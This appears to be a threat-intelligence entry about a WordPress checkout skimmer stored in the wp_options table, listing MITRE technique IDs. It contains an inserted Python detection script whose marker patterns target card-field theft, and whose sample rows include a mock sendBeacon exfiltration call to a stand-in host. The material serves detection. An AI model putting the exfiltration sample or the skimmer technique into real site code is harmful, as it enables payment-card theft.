
Stealthy Credit Card Skimmer Targets WordPress Checkout Pages via Database Injection

Jan. 10, 2025, 8:41 a.m.

Description

A sophisticated credit card skimmer malware has been discovered targeting WordPress websites. The malware injects malicious JavaScript into database entries, specifically in the wp_options table, to steal sensitive payment details from checkout pages. It activates only on checkout pages, either hijacking existing payment fields or injecting a fake credit card form. The malware uses Base64 encoding and AES-CBC encryption to obfuscate stolen data before sending it to attacker-controlled servers. This stealthy approach allows the malware to persist undetected on compromised sites, avoiding common file-scanning tools. The attack demonstrates the evolving techniques used by attackers to target sensitive checkout processes in WordPress environments.
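One way to triage the database-resident injection described above, added here as an example and not taken from the original report: it scans exported wp_options rows for script content that also carries checkout, Base64, AES-CBC, card-field or outbound-request markers. The marker list, threshold, option names and sample rows are assumptions constructed for illustration.

```python
import re

# Heuristic markers derived from the behaviour in the description.
# Names, patterns and the threshold are assumptions of this example.
MARKERS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "checkout_gate": re.compile(r"checkout", re.I),
    "base64_call": re.compile(r"\b(?:atob|btoa)\s*\(", re.I),
    "aes_cbc": re.compile(r"AES-CBC|crypto\.subtle", re.I),
    "card_fields": re.compile(r"card[\s_-]?number|cvv|cvc|expir", re.I),
    "exfil_call": re.compile(r"\b(?:fetch|sendBeacon|XMLHttpRequest)\b"),
}

def score_option(option_value):
    """Return the sorted marker names found in one option_value string."""
    return sorted(n for n, rx in MARKERS.items() if rx.search(option_value))

def triage(rows, threshold=3):
    """rows: (option_name, option_value) tuples exported from wp_options.
    A row is reported only if it embeds a script tag AND reaches the
    threshold, so ordinary settings mentioning 'checkout' stay quiet."""
    findings = []
    for name, value in rows:
        hits = score_option(value)
        if "script_tag" in hits and len(hits) >= threshold:
            findings.append((name, hits))
    return findings

# Constructed sample rows: inert marker text, not real IoCs.
SAMPLE_ROWS = [
    ("siteurl", "https://shop.example"),
    ("example_banner", '<script>document.title = "Welcome";</script>'),
    ("example_html_widget",
     '<script>if (location.pathname.includes("checkout")) {'
     ' /* reads card-number and cvv fields */'
     ' /* AES-CBC encrypt, then btoa(...) */'
     ' navigator.sendBeacon("https://collector.invalid/c", ""); }</script>'),
    ("example_checkout_page_id", "7"),
]

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_ROWS):
        print(f"review wp_options row {name!r}: {', '.join(hits)}")
```

Rows it reports are candidates for manual review, not confirmed infections; legitimate payment plugins can store script in the database too.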

Date

Published: Jan. 10, 2025, 1:21 a.m.

Created: Jan. 10, 2025, 1:21 a.m.

Modified: Jan. 10, 2025, 8:41 a.m.

Attack Patterns

T1056.003

T1592.002

T1132.001

T1185

T1059.007

T1071.001

T1055

T1140

T1027

Additional Information

Retail

Finance